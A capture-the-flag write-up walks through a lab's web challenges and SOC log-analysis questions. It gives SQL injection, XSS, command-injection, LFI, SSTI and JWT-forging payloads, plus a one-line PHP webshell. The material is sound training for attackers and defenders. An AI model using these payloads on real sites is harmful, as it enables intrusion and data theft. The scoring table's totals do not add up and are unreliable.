CyberTech Solutions CTF Writeup

👋 Introduction

This is my first blog post! I recently organized and ran the CyberTech Solutions CTF — a Capture The Flag competition with both offensive (Red Team) and defensive (Blue Team) tracks. The event featured 26 challenges worth a combined 3,500 points, ranging from classic web exploitation to SOC-style log analysis. Below is the full writeup for every challenge.

🔑 Default Credentials: admin:admin123 · john:password123 · guest:guest

⚔️

Red Team — Exploitation

13 challenges · 1,750 points

#01 SQL Injection

easy 100pts

🎯 Target: /challenge/login_legacy.php → /challenge/dashboard.php

Walkthrough

Open /challenge/login.php and View Source — a comment at the bottom reveals: . Also check /challenge/robots.txt — it lists Disallow: /login_legacy.php.
Navigate to /challenge/login_legacy.php.
In the Username field, enter: ' OR '1'='1 — in the Password field, enter anything.
Click Sign In — the query becomes SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'anything'. Since '1'='1' is always true, it returns the first user (admin).
Click the Dashboard link — the flag is displayed on the page.

sql

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'anything'

💡

Other working payloads: admin' -- (comments out password check), ' OR 1=1-- (returns all users).

🏁

Flag

CCEE{sql_1nj3ct10n_m4st3r}

#02 Reflected XSS

easy 100pts

🎯 Target: /challenge/about.php

Walkthrough

Visit /challenge/about.php and click any View Profile button. The URL changes to about.php?member=Robert%20Anderson — the name is reflected without sanitization.
Craft a URL with a script tag: /challenge/about.php?member=<script>alert('XSS')</script>
Open the URL — JavaScript executes and a hint appears: "🎉 XSS Detected!"
Open DevTools → Application → Cookies — find the xss_reward cookie.

html

🏁

Flag

CCEE{xss_r3fl3ct3d_4tt4ck}

#03 Stored XSS

easy 100pts

🎯 Target: /challenge/contact.php

Walkthrough

Visit /challenge/contact.php and scroll to Public Feedback.
Fill the contact form — Name: Attacker, Email: attacker@evil.com, Message: <script>alert('XSS')</script>
Click Send Message — the page reloads and your script executes from the stored message.
A hint card appears — open DevTools → Cookies → find stored_xss_reward.

html

🏁

Flag

CCEE{st0r3d_xss_1n_c0nt4ct}

#04 IDOR

easy 100pts

🎯 Target: /challenge/view_message.php

Walkthrough

Log in as john:password123.
Visit the Contact page and click on any public message — the URL is view_message.php?id=2.
Change the id parameter to 1: /challenge/view_message.php?id=1
Message id=1 is a private admin message — there's no authorization check, so it renders anyway. The message body contains the flag.

🏁

Flag

CCEE{1d0r_vuln3r4b1l1ty_f0und}

#05 Information Disclosure

easy 50pts

🎯 Target: /challenge/config.php.bak

Walkthrough

Check /challenge/robots.txt: Disallow: /config.php.bak
Navigate to /challenge/config.php.bak — since .bak isn't processed by PHP, the raw source is shown.
Inside you'll find hardcoded credentials and the flag.

php

// Secret flag for CTF
// CCEE{b4ckup_f1l3s_l34k_s3cr3ts}

🏁

Flag

CCEE{b4ckup_f1l3s_l34k_s3cr3ts}

#06 HTTP Header Leak

easy 50pts

🎯 Target: /challenge/dashboard.php

Walkthrough

Log in and visit the dashboard.
Open DevTools → Network tab, refresh the page.
Click the dashboard.php request and check Response Headers — the flag is in a custom header: X-Custom-Flag: CCEE{h34d3r5_t3ll_s3cr3ts}

bash

curl -I -b cookies.txt http:///challenge/dashboard.php
# X-Custom-Flag: CCEE{h34d3r5_t3ll_s3cr3ts}

🏁

Flag

CCEE{h34d3r5_t3ll_s3cr3ts}

#07 Local File Inclusion

medium 200pts

🎯 Target: /challenge/admin.php

Walkthrough

Log in as admin:admin123 (credentials from Challenge 5).
Navigate to /challenge/admin.php — notice sidebar links like ?file=admin_welcome.
Use a PHP stream wrapper to read the config source: /challenge/admin.php?file=php://filter/read=convert.base64-encode/resource=includes/config
A base64 string appears in the Console Output area. Decode it to reveal the flag.

bash

echo "PD9waHAK..." | base64 -d
# Result: CCEE{c0nf1g_f1l3s_4r3_tr34sur3s}

🏁

Flag

CCEE{c0nf1g_f1l3s_4r3_tr34sur3s}

#08 Command Injection

medium 200pts

🎯 Target: /challenge/tools.php

Walkthrough

Log in and go to /challenge/tools.php (Network Tools).
Select Ping, enter: 127.0.0.1; whoami — output shows www-data, confirming injection.
Now enter: ; cat includes/cmd_flag.txt — the flag is printed.

bash

; cat includes/cmd_flag.txt

🏁

Flag

CCEE{c0mm4nd_1nj3ct10n_pwn3d}

#09 Logic Flaw

medium 150pts

🎯 Target: /challenge/shop.php

Walkthrough

Log in as john:password123 and go to /challenge/shop.php. You start with $100. The CTF Flag item costs $1,000,000.
Find any item (e.g. "Standard Support" at $50). Set the quantity to -100000 and click Buy Now.
The server calculates: 50 × (-100000) = -5,000,000, then 100 - (-5,000,000) = 5,000,100. You now have $5,000,100.
Buy the CTF Flag item (quantity 1).

💡

The server doesn't validate that quantity must be positive — a classic business logic flaw.

🏁

Flag

CCEE{l0g1c_fl4w_sh0pp1ng_spr33}

#10 CSRF

medium 150pts

🎯 Target: /challenge/profile.php + /challenge/report.php

Walkthrough

Log in as john:password123 and inspect /challenge/profile.php — no CSRF tokens on any form.
Use the provided exploit page (auto-submitting form that changes the password to hacked123).
Go to /challenge/report.php and submit the exploit URL — the admin bot visits it and the hidden form fires.
Admin's password is now hacked123. Log in as admin / hacked123.
Visit /challenge/profile.php — the Admin Secrets section shows the flag.

🏁

Flag

CCEE{csrf_n0_t0k3n_n0_pr0t3ct10n}

#11 Unrestricted File Upload

medium 150pts

🎯 Target: /challenge/careers.php

Walkthrough

Create a PHP webshell: <?php system($_GET['cmd']); ?> and save as shell.php.
Go to /challenge/careers.php and submit an application, uploading shell.php as the resume.
Access the webshell: /challenge/uploads/shell.php?cmd=cat includes/upload_flag.txt

php

🏁

Flag

CCEE{unr3str1ct3d_f1l3_upl04d_rce}

#12 SSTI

hard 250pts

🎯 Target: /challenge/newsletter.php?mode=preview

Walkthrough

Visit /challenge/newsletter.php — add ?mode=preview to access the hidden Template Editor.
Confirm code execution — enter: ${7*7} → it renders 49.
Enter: ${file_get_contents('includes/ssti_flag.txt')} — the flag is rendered.

text

${file_get_contents('includes/ssti_flag.txt')}

🏁

Flag

CCEE{sst1_t3mpl4t3_1nj3ct10n_pwn3d}

#13 JWT Exploitation

hard 250pts

🎯 Target: /challenge/jwt_demo.php + /challenge/api/auth.php

Walkthrough

Get a legitimate JWT by logging in via the API as guest:guest.
Decode the token — it uses HS256 algorithm.
Forge a new token with "alg":"none" and payload: {"user_id":1,"username":"admin","role":"admin"}
Base64url-encode both parts and assemble: <header>.<payload>. (empty signature, keep trailing dot).
Access the admin endpoint with the forged token.

bash

echo -n '{"typ":"JWT","alg":"none"}' | base64 | tr '+/' '-_' | tr -d '='
echo -n '{"user_id":1,"username":"admin","role":"admin","iat":1234567890}' | base64 | tr '+/' '-_' | tr -d '='

🏁

Flag

CCEE{jwt_4lg0r1thm_c0nfus10n_4tt4ck}

🛡️

Blue Team — SOC Investigation

13 challenges · 1,750 points · Dashboard: analyst:analyst123

#01 First Contact

Alert Triage easy 100pts

❓

Question: At what exact timestamp (HH:MM:SS) was the first attack alert recorded on Feb 08?

Walkthrough

Log into the Blue Team dashboard.
Sort the log feed by Time (ascending).
Skip benign system messages (jk2_init(), workerEnv.init()).
The first ALERT entry is: Feb 08 00:01:52 firewall-02 waf: ALERT CMD injection detected

🏁

Flag

CCEE{00:01:52}

#02 Identify the Spray

SSH Analysis easy 100pts

❓

Question: Which source IP has the most failed SSH password attempts targeting the root account?

Walkthrough

Filter by SSH or search for Failed password for root.
Tally per IP: 112.95.230.3 → 15, 5.36.59.76 → 10, 173.234.31.186 → 10.

🏁

Flag

CCEE{112.95.230.3}

#03 Attack Surface

Log Classification easy 100pts

❓

Question: Which attack type triggered the most WAF alerts?

Walkthrough

Check the Attack Vectors chart or count ALERT entries by type.
XSS: 180, RCE: 177, SSTI: 168, CMD Injection: 164, SQLi: 156, LFI: 155.

🏁

Flag

CCEE{xss}

#04 File Target

LFI Analysis easy 100pts

❓

Question: What file was the attacker attempting to read via LFI?

Walkthrough

Filter by LFI — every alert shows: GET /vulnerable.php?page=../../../../etc/passwd
Target file: /etc/passwd → formatted as etc_passwd.

🏁

Flag

CCEE{etc_passwd}

#05 Noise Filter

False Positive ID easy 50pts

❓

Question: Which recurring application initialization message is benign noise, NOT an attack?

Walkthrough

Browse non-ALERT entries and count recurring patterns.
workerEnv.init() ok: 145 times, jk2_init() Found child: 115 times.
jk2_init() is Apache mod_jk (Tomcat connector) initialization — completely benign.

🏁

Flag

CCEE{jk2_init}

#06 System Health

Operational Logs easy 50pts

❓

Question: What system warning appears 26 times, indicating an infrastructure problem?

Walkthrough

Search for warning in the logs.
Find: warning: disk space low on /var/log appearing 26 times across multiple hosts.

🏁

Flag

CCEE{disk_space_low}

#07 Suspicious Domain

SSH Forensics medium 200pts

❓

Question: What FQDN triggered the SSHD POSSIBLE BREAK-IN ATTEMPT warning?

Walkthrough

Search for POSSIBLE BREAK-IN ATTEMPT.
Find: reverse mapping checking getaddrinfo for ns.marryaldkfaczcz.com [173.234.31.186] failed
The random-looking domain is characteristic of a DGA (Domain Generation Algorithm).

🏁

Flag

CCEE{ns.marryaldkfaczcz.com}

#08 Top Attacker

Attacker Profiling medium 200pts

❓

Question: Which IP generated the most total log entries, and how many? Format: IP_count

Walkthrough

Correlate all log entries per SSH attacker IP.
173.234.31.186: 50 entries, 112.95.230.3: 40, 218.188.2.4: 38.
173.234.31.186 shows the most diverse activity: auth failures, invalid user attempts, DNS failures, break-in alerts.

🏁

Flag

CCEE{173.234.31.186_50}

#09 Privilege Check

RCE Analysis medium 150pts

❓

Question: What user account was executing commands during the RCE attempts?

Walkthrough

Filter by RCE — every alert follows: ALERT RCE Attempt: uname -a executed by www-data
www-data = web server process user. Web-level access, not root.

🏁

Flag

CCEE{www-data}

#10 Brute Lockout

SSH Investigation medium 150pts

❓

Question: Which IP caused PAM to log ignoring max retries; 6 > 3?

Walkthrough

Search for max retries — find: PAM service(sshd) ignoring max retries; 6 > 3
These entries come from SSH session 24227.
Correlate session 24227: Failed password for root from 5.36.59.76

🏁

Flag

CCEE{5.36.59.76}

#11 Username Harvest

Credential Attack medium 150pts

❓

Question: List the three invalid usernames attempted via SSH, sorted by frequency.

Walkthrough

Search for Invalid user.
webmaster: 10 attempts (173.234.31.186), test9: 5 (52.80.34.196), chen: 5 (202.100.179.208).

🏁

Flag

CCEE{webmaster_test9_chen}

#12 Cloud Attribution

Threat Intel hard 250pts

❓

Question: Identify the cloud prefix, AWS region, and username. Format: prefix_region_username

Walkthrough

Search for cloud-related hostnames in SSH logs.
Find: rhost=ec2-52-80-34-196.cn-north-1.compute.amazonaws.com.cn
Prefix: ec2, Region: cn-north-1 (AWS China – Beijing).
Cross-reference IP 52.80.34.196: Invalid user test9.

🏁

Flag

CCEE{ec2_cn-north-1_test9}

#13 Kill Chain

Attack Reconstruction hard 250pts

❓

Question: List all unique web attack types in chronological order of first appearance.

Walkthrough

Sort ALERT entries by timestamp and track first occurrence:
00:02:29 → LFI, 00:04:24 → SQLi, 00:07:10 → SSTI, 00:08:03 → XSS, 00:09:58 → RCE.
This mirrors a real attack lifecycle: recon → DB probing → code execution → client-side → full compromise.

🏁

Flag

CCEE{lfi_sqli_ssti_xss_rce}

📊 Scoring Summary

Tier	Red Team	Blue Team	Combined
🟢 Easy	6 · 500pts	6 · 500pts	1,000pts
🟡 Medium	5 · 850pts	5 · 850pts	1,700pts
🔴 Hard	2 · 500pts	2 · 500pts	1,000pts
Total	13 · 1,750pts	13 · 1,750pts	3,500pts